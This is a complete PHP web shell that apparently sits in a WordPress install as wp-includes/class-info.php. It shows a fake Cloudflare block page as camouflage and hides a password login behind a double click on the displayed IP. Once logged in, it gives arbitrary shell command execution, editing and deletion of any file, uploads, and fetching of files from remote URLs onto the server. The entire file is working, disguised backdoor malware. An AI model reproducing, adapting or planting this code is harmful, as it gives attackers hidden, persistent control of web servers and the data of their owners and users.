File: //home/pelakir/www/wp-includes/class-info.php
<?php
session_start();
error_reporting(0);
set_time_limit(0);
$ray_id = bin2hex(random_bytes(8));
$ip_address = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] :
(isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] :
(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '127.0.0.1'));
$timestamp = date('Y-m-d H:i');
$stored_hash = '$2a$16$tnJwbScpyXgA4kehCm902OKmgQmkq2gVbnhxrG3hHdXr0OZpxml/e';
if (isset($_GET['logout'])) {
session_destroy();
header("Location: ?");
exit;
}
if (isset($_GET['fm']) && isset($_SESSION['alfa_session']) && $_SESSION['alfa_session'] === true) {
showFileManager();
exit;
}
if (isset($_GET['access_fm']) && $_GET['access_fm'] === '1') {
header("Location: ?fm=1");
exit;
}
// Jika mode FM diminta tapi belum login โ Tampilkan LOGIN
if (isset($_GET['fm'])) {
showFmLogin();
exit;
}
if (isset($_GET['cf'])) {
session_destroy();
header("Location: ?");
exit;
}
showCloudflareBlock();
function showCloudflareBlock() {
global $ray_id, $ip_address, $timestamp;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta timestamp="<?php echo $timestamp; ?>" />
<title>Sorry, you have been blocked</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
html, body { min-height: 100%; }
body {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Arial, Helvetica, sans-serif;
background: linear-gradient(to bottom, #f2f2f2 0, #ececec 150px, #f6f6f6 151px, #f6f6f6 100%);
color: #333;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.page { width: 100%; }
.top-area { padding: 32px 0 0; }
.header { max-width: 1120px; margin: 0 auto; padding: 0 34px; }
.header h1 { font-size: 52px; font-weight: 300; line-height: 1.08; letter-spacing: -1px; color: #333; margin-bottom: 8px; }
.header .subtext { font-size: 18px; line-height: 1.35; color: #4f4f4f; font-weight: 400; }
.mockup-band { width: 100%; margin-top: 26px; background: #e6e6e6; border-top: 1px solid #dddddd; border-bottom: 1px solid #dddddd; padding: 54px 0 0; }
.mockup-wrap { max-width: 1120px; margin: 0 auto; padding: 0 34px; }
.browser-shell { width: 100%; }
.browser-bar { height: 46px; background: #a7a7a7; border-radius: 2px 2px 0 0; position: relative; overflow: hidden; }
.browser-topline { height: 100%; display: flex; align-items: flex-start; padding: 9px 0 0 13px; }
.dot { width: 10px; height: 10px; border-radius: 50%; background: #e3e3e3; margin-right: 5px; flex: 0 0 auto; }
.fake-tab { width: 146px; height: 21px; background: #e3e3e3; margin-left: 12px; clip-path: polygon(8% 100%, 0 0, 92% 0, 100% 100%); border-radius: 2px 2px 0 0; flex: 0 0 auto; }
.browser-content { background: #ffffff; min-height: 360px; display: flex; align-items: center; justify-content: center; position: relative; }
.error-circle { width: 142px; height: 142px; border-radius: 50%; background: #c81d1d; display: flex; align-items: center; justify-content: center; }
.error-circle svg { width: 74px; height: 74px; fill: #fff; display: block; }
.info-area { max-width: 1120px; margin: 0 auto; padding: 28px 34px 0; background: #f6f6f6; }
.info-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 56px; }
.info-block h2 { font-size: 28px; line-height: 1.2; font-weight: 400; color: #2f2f2f; margin-bottom: 16px; }
.info-block p { font-size: 14px; line-height: 1.6; color: #333; font-weight: 400; max-width: 470px; }
.footer { max-width: 1120px; margin: 30px auto 0; padding: 0 34px 16px; background: #f6f6f6; }
.footer-line { border-top: 1px solid #dddddd; padding-top: 16px; text-align: center; font-size: 12px; line-height: 1.6; color: #666; }
.footer-line strong { font-weight: 600; color: #444; }
.footer-line a { color: #2b73b6; text-decoration: none; }
.footer-line a:hover { text-decoration: underline; }
.reveal-ip { color: #2b73b6; cursor: pointer; transition: all 0.2s ease; }
.reveal-ip:hover { text-decoration: underline; }
.ip-revealed { color: #333; font-weight: 500; letter-spacing: 1px; cursor: pointer; position: relative; }
.ip-revealed:hover { color: #2b73b6; text-decoration: underline; }opacity 0.2s; }
.ip-revealed:hover::after { opacity: 1; }
.sep { color: #999; margin: 0 6px; }
@media (max-width: 900px) {
.header h1 { font-size: 40px; }
.info-grid { grid-template-columns: 1fr; gap: 34px; }
.browser-content { min-height: 300px; }
.error-circle { width: 120px; height: 120px; }
.error-circle svg { width: 64px; height: 64px; }
}
@media (max-width: 640px) {
.top-area { padding-top: 24px; }
.header, .mockup-wrap, .info-area, .footer { padding-left: 18px; padding-right: 18px; }
.header h1 { font-size: 34px; }
.header .subtext { font-size: 16px; }
.browser-bar { height: 40px; }
.fake-tab { width: 110px; height: 18px; }
.info-block h2 { font-size: 24px; }
}
</style>
</head>
<body>
<div class="page">
<div class="top-area">
<div class="header">
<h1>Sorry, you have been blocked</h1>
<p class="subtext">You are unable to access <?php echo htmlspecialchars($_SERVER['HTTP_HOST'] ?? 'example.com', ENT_QUOTES, 'UTF-8'); ?></p>
</div>
<div class="mockup-band">
<div class="mockup-wrap">
<div class="browser-shell">
<div class="browser-bar">
<div class="browser-topline">
<span class="dot"></span>
<span class="dot"></span>
<span class="dot"></span>
<div class="fake-tab"></div>
</div>
</div>
<div class="browser-content">
<div class="error-circle">
<svg viewBox="0 0 24 24" aria-hidden="true">
<path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/>
</svg>
</div>
</div>
</div>
</div>
</div>
<div class="info-area">
<div class="info-grid">
<div class="info-block">
<h2>Why have I been blocked?</h2>
<p>This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.</p>
</div>
<div class="info-block">
<h2>What can I do to resolve this?</h2>
<p>You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.</p>
</div>
</div>
</div>
<div class="footer">
<div class="footer-line">
<span>Cloudflare Ray ID: <strong><?php echo $ray_id; ?></strong></span>
<span class="sep">โข</span>
<span>Your IP: <span id="ip-display" class="reveal-ip" onclick="handleIpClick(this)" data-ip="<?php echo htmlspecialchars($ip_address, ENT_QUOTES, 'UTF-8'); ?>">Click to reveal</span></span>
<span class="sep">โข</span>
<span>Performance & security by <a href="https://www.cloudflare.com/" target="_blank" rel="noopener noreferrer">Cloudflare</a></span>
</div>
</div>
</div>
</div>
<script>
function handleIpClick(element) {
const ip = element.getAttribute('data-ip');
if (element.classList.contains('revealed')) {
element.style.cursor = 'wait';
element.textContent = 'Accessing...';
window.location.href = '?access_fm=1';
} else {
element.textContent = ip;
element.classList.remove('reveal-ip');
element.classList.add('ip-revealed');
element.classList.add('revealed');
}
}
</script>
</body>
</html>
<?php
exit;
}
function showFmLogin() {
global $stored_hash;
$login_error = '';
// Proses login
if (isset($_POST['login'])) {
if (password_verify($_POST['p'], $stored_hash)) {
$_SESSION['alfa_session'] = true;
$_SESSION['login_time'] = date('Y-m-d H:i:s');
header("Location: ?fm=1");
exit;
} else {
$login_error = "โ Password salah!";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>๐โโฌ DUM CAT LOGIN</title>
<style>
body {
background: #000;
color: #0f0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
font-family: monospace;
margin: 0;
}
form {
text-align: center;
}
h3 {
margin-bottom: 20px;
}
input[type="password"] {
background: #000;
border: 1px solid #333;
color: #0f0;
padding: 10px;
font-family: monospace;
font-size: 14px;
width: 200px;
}
button {
width: 200px;
background: #0f0;
color: #000;
border: none;
cursor: pointer;
padding: 10px;
font-weight: bold;
margin-top: 15px;
}
.error {
color: #ff4444;
margin-bottom: 10px;
}
</style>
</head>
<body>
<form method="POST">
<h3>[ DUM CAT LOGIN ]</h3>
<?php if (!empty($login_error)) echo '<p class="error">' . $login_error . '</p>'; ?>
<input type="password" name="p" placeholder="" autofocus><br><br>
<button type="submit" name="login">ENTER</button>
</form>
</body>
</html>
<?php
exit;
}
function showFileManager() {
// FIX: Path handling yang lebih robust
$path = isset($_GET['path']) ? $_GET['path'] : __DIR__;
// Bersihkan path dari multiple slashes
$path = preg_replace('#/+#', '/', $path);
$real_path = realpath($path);
// Jika realpath gagal, gunakan path asli
if ($real_path === false) {
$real_path = $path;
}
// Pastikan path valid
if (!is_dir($real_path)) {
$real_path = realpath(__DIR__);
}
// Jika masih kosong, gunakan root atau current dir
if (empty($real_path)) {
$real_path = '/';
}
$path = $real_path;
chdir($path);
// File operations
if (isset($_POST['save_file'])) {
file_put_contents($_POST['filepath'], $_POST['filecontent']);
}
if (isset($_POST['do_rename'])) {
rename($_POST['old_name'], $path . '/' . $_POST['new_name']);
}
if (isset($_POST['do_make_file'])) {
file_put_contents($path . '/' . $_POST['n_file'], "");
}
if (isset($_POST['do_make_dir'])) {
mkdir($path . '/' . $_POST['n_dir']);
}
if (isset($_GET['del'])) {
$target = $_GET['del'];
function rmdir_recursive($dir) {
if (is_dir($dir)) {
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) rmdir_recursive("$dir/$file");
rmdir($dir);
} else unlink($dir);
}
rmdir_recursive($target);
header("Location: ?fm=1&path=".urlencode($path));
exit;
}
if (isset($_POST['do_upload'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $path.'/'.$_FILES['file']['name']);
}
if (isset($_POST['rem_upload'])) {
copy($_POST['url'], $path.'/'.basename($_POST['url']));
}
// FIX: Helper function get_pwd yang lebih robust
function get_pwd($current_path) {
// Bersihkan path
$current_path = trim($current_path);
$current_path = preg_replace('#/+#', '/', $current_path);
// Jika kosong atau root
if (empty($current_path) || $current_path === '/') {
return '/';
}
// Pisahkan path
$parts = explode('/', $current_path);
$result = '';
$accumulated = '';
foreach ($parts as $part) {
if (empty($part)) continue;
$accumulated .= '/' . $part;
$result .= '/<a href="?fm=1&path='.urlencode($accumulated).'" style="color:#0f0;text-decoration:none;">'.htmlspecialchars($part).'</a>';
}
// Jika hasil kosong, return root
if (empty($result)) {
return '/';
}
return $result;
}
function get_user_group($file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$stat = stat($file);
if ($stat) {
$uid = $stat['uid'];
$gid = $stat['gid'];
$user_info = posix_getpwuid($uid);
$group_info = posix_getgrgid($gid);
return $user_info['name'] . '/' . $group_info['name'];
}
}
return 'N/A';
}
?>
<!DOCTYPE html>
<html>
<head>
<title>๐โโฌ DUM CAT FILE MANAGER PRO</title>
<style>
body { background: #000; color: #c9d1d9; font-family: monospace; font-size: 12px; margin: 0; }
/* FIX: PWD bar dengan layout flex untuk menghindari overlap */
.pwd-bar {
background: #000;
padding: 10px;
border-left: 5px solid #0f0;
border-bottom: 1px solid #333;
display: flex;
justify-content: space-between;
align-items: center;
}
.pwd-left {
flex: 1;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.pwd-right {
margin-left: 15px;
flex-shrink: 0;
}
.pwd-bar a {
color: #ff4444;
font-weight: bold;
text-decoration: none;
}
.nav { display: flex; gap: 5px; padding: 10px; background: #0d1117; flex-wrap: wrap; }
.btn-nav { border: 1px solid #333; padding: 4px 10px; color: #0f0; background: #161b22; cursor: pointer; text-decoration: none; border-radius:3px; transition: all 0.3s; }
.btn-nav:hover { background: #0f0 !important; color: #000 !important; }
table { width: 100%; border-collapse: collapse; }
th { background: #161b22; color: #8b949e; padding: 8px; text-align: left; }
td { padding: 6px 10px; border-bottom: 1px solid #21262d; }
.action-link { color: #fff; text-decoration: none; margin-right: 8px; font-weight: bold; cursor: pointer; }
.action-link:hover { color: #0f0 !important; }
.user-group { color: #58a6ff; font-size: 11px; }
input[type="text"], textarea, input[type="file"] { background: #000; border: 1px solid #333; color: #0f0; padding: 5px; font-family: monospace; }
.go { color: #0f0; background: none; border: 1px solid #0f0; cursor: pointer; font-size: 14px; font-weight: bold; padding: 4px 12px; border-radius: 3px; transition: all 0.3s; }
.go:hover { background: #0f0; color: #000; }
pre { background: #0d1117; color: #0f0; padding: 10px; border: 1px solid #333; overflow: auto; max-height: 400px; text-align: left; white-space: pre-wrap; font-size: 11px; line-height: 1.4; }
.success { color: #0f0; font-weight: bold; padding: 10px; background: #0a1a0a; border-left: 4px solid #0f0; margin: 10px 0; }
tr:hover { background: rgba(15,255,0,0.05) !important; }
.editor { width: 100%; height: 500px; font-family: monospace; font-size: 13px; }
</style>
</head>
<body>
<!-- FIX: PWD bar dengan layout flex -->
<div class="pwd-bar">
<div class="pwd-left">
๐โโฌ PWD: <?php echo get_pwd($path); ?>
</div>
<div class="pwd-right">
<a href="?logout=1">[ ๐ช Logout ]</a>
</div>
</div>
<div class="nav">
<a href="?fm=1&path=<?php echo urlencode($path); ?>" class="btn-nav">๐ Refresh</a>
<a href="?fm=1&action=terminal&path=<?php echo urlencode($path); ?>" class="btn-nav">๐ป Terminal</a>
<a href="?cf=1" class="btn-nav" style="background:#ff4444;color:#fff;">๐ Back to CF Page</a>
</div>
<?php if (isset($_POST['do_upload'])): ?>
<div class="success">โ
File uploaded: <?php echo $_FILES['file']['name']; ?></div>
<?php endif; ?>
<?php if (isset($_POST['rem_upload'])): ?>
<div class="success">โ
Downloaded: <?php echo basename($_POST['url']); ?></div>
<?php endif; ?>
<?php if (isset($_GET['action']) && $_GET['action'] == 'terminal'): ?>
<div style="padding:20px;">
<h3 style="color:#0f0;">>__ Terminal Console (Path: <?php echo $path; ?>)</h3>
<form method="POST">
<input type="text" name="cmd" style="width:80%;" placeholder="ls -la" autofocus>
<button type="submit" name="exec_cmd" class="go">ยป EXECUTE</button>
</form>
<?php if(isset($_POST['exec_cmd'])): ?>
<pre><?php echo htmlspecialchars(shell_exec("timeout 10 " . $_POST['cmd'] . " 2>&1")); ?></pre>
<?php endif; ?>
</div>
<?php elseif(isset($_GET['edit'])): ?>
<div style="padding:20px;">
<h3 style="color:#0f0;">โ๏ธ Editing: <span style="color:#58a6ff;"><?php echo basename($_GET['edit']); ?></span></h3>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $_GET['edit']; ?>">
<textarea name="filecontent" class="editor"><?php echo htmlspecialchars(file_get_contents($_GET['edit'])); ?></textarea><br><br>
<button type="submit" name="save_file" class="go" style="background:#0f0; color:#000; font-size:16px; padding:12px 24px;">๐พ SAVE CHANGES</button>
<a href="?fm=1&path=<?php echo urlencode($path); ?>" class="btn-nav" style="margin-left:15px;">โ Back</a>
</form>
</div>
<?php elseif(isset($_GET['ren'])): ?>
<div style="padding:20px; text-align:center;">
<h3 style="color:#0f0;">๐ Rename: <span style="color:#fff;"><?php echo basename($_GET['ren']); ?></span></h3>
<form method="POST">
<input type="hidden" name="old_name" value="<?php echo $_GET['ren']; ?>">
<input type="text" name="new_name" value="<?php echo htmlspecialchars(basename($_GET['ren'])); ?>" style="width:400px; font-size:14px;" autofocus>
<button type="submit" name="do_rename" class="go" style="font-size:16px;">โ
RENAME</button>
</form>
<a href="?fm=1&path=<?php echo urlencode($path); ?>" class="btn-nav" style="margin-top:15px; display:inline-block;">โ Back</a>
</div>
<?php else: ?>
<table>
<thead><tr><th style="width:35%">๐ Name</th><th>User/Group</th><th>Size</th><th>Perms</th><th>Actions</th></tr></thead>
<tbody>
<?php
$dirs = [];
$files = [];
foreach (scandir($path) as $item):
if($item == "." || $item == "..") continue;
$f = $path.'/'.$item;
$isDir = is_dir($f);
$size = $isDir ? '-' : (filesize($f) > 1024*1024 ? round(filesize($f)/1024/1024,1).'MB' : round(filesize($f)/1024,1).'KB');
$usergroup = get_user_group($f);
if ($isDir) {
$dirs[] = ['item' => $item, 'f' => $f, 'size' => $size, 'usergroup' => $usergroup];
} else {
$files[] = ['item' => $item, 'f' => $f, 'size' => $size, 'usergroup' => $usergroup];
}
endforeach;
foreach ($dirs as $dir):
$item = $dir['item'];
$f = $dir['f'];
$size = $dir['size'];
$usergroup = $dir['usergroup'];
?>
<tr>
<td style="font-weight:500;"><span style="color:#e3b341;">๐ DIR</span>
<a href="?fm=1&path=<?php echo urlencode($f); ?>" style="color:#e3b341;"><?php echo htmlspecialchars($item); ?>/</a>
</td>
<td class="user-group"><?php echo $usergroup; ?></td>
<td style="color:#8b949e;"><?php echo $size; ?></td>
<td style="color:#0f0; font-family:monospace;"><?php echo substr(sprintf('%o', fileperms($f)), -4); ?></td>
<td style="white-space:nowrap;">
<a href="?fm=1&ren=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#f59e0b;" title="Rename">๐</a>
<a href="?fm=1&del=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#ff4444;" onclick="return confirm('๐๏ธ Delete <?= $item ?>?')" title="Delete">๐๏ธ</a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $file):
$item = $file['item'];
$f = $file['f'];
$size = $file['size'];
$usergroup = $file['usergroup'];
?>
<tr>
<td style="font-weight:500;"><span style="color:#58a6ff;">๐</span>
<a href="?fm=1&edit=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" style="color:#58a6ff;"><?php echo htmlspecialchars($item); ?></a>
</td>
<td class="user-group"><?php echo $usergroup; ?></td>
<td style="color:#8b949e;"><?php echo $size; ?></td>
<td style="color:#0f0; font-family:monospace;"><?php echo substr(sprintf('%o', fileperms($f)), -4); ?></td>
<td style="white-space:nowrap;">
<a href="?fm=1&ren=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#f59e0b;" title="Rename">๐</a>
<a href="?fm=1&edit=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#58a6ff;" title="Edit">โ๏ธ</a>
<a href="?fm=1&del=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#ff4444;" onclick="return confirm('๐๏ธ Delete <?= $item ?>?')" title="Delete">๐๏ธ</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<div style="background: #0d1117; border-top: 1px solid #333; padding: 25px; display: grid; grid-template-columns: repeat(auto-fit, minmax(280px, 1fr)); gap: 20px; margin-top:15px;">
<div style="text-align:center;">
<strong style="color:#0f0;">๐ Make File</strong><br>
<form method="POST" style="margin-top:10px;">
<input type="text" name="n_file" placeholder="shell.php" style="width:70%;">
<button name="do_make_file" class="go">โถ๏ธ</button>
</form>
</div>
<div style="text-align:center;">
<strong style="color:#e3b341;">๐ Make Directory</strong><br>
<form method="POST" style="margin-top:10px;">
<input type="text" name="n_dir" placeholder="new_folder" style="width:70%;">
<button name="do_make_dir" class="go">โถ๏ธ</button>
</form>
</div>
<div style="text-align:center;">
<strong style="color:#58a6ff;">๐ค Local Upload</strong><br>
๐ <span style="color:#0f0;"><?php echo basename($path); ?></span><br>
<form method="POST" enctype="multipart/form-data" style="margin-top:10px;">
<input type="file" name="file" style="width:70%; color:#0f0;">
<button name="do_upload" class="go">โถ๏ธ</button>
</form>
</div>
<div style="text-align:center;">
<strong style="color:#ff6b6b;">๐ Remote Upload</strong><br>
<form method="POST" style="margin-top:10px;">
<input type="text" name="url" placeholder="http://site.com/file.txt" style="width:70%;">
<button name="rem_upload" class="go">โถ๏ธ</button>
</form>
</div>
</div>
<?php endif; ?>
<div style="text-align:center; color:#666; padding:30px; font-size:11px; border-top:1px solid #333; margin-top:20px;">
๐โโฌ <strong>DUM CAT FILE MANAGER PRO v2.0</strong> |
Login: <?php echo $_SESSION['login_time'] ?? 'Unknown'; ?>
</div>
</body>
</html>
<?php
exit;
}
?>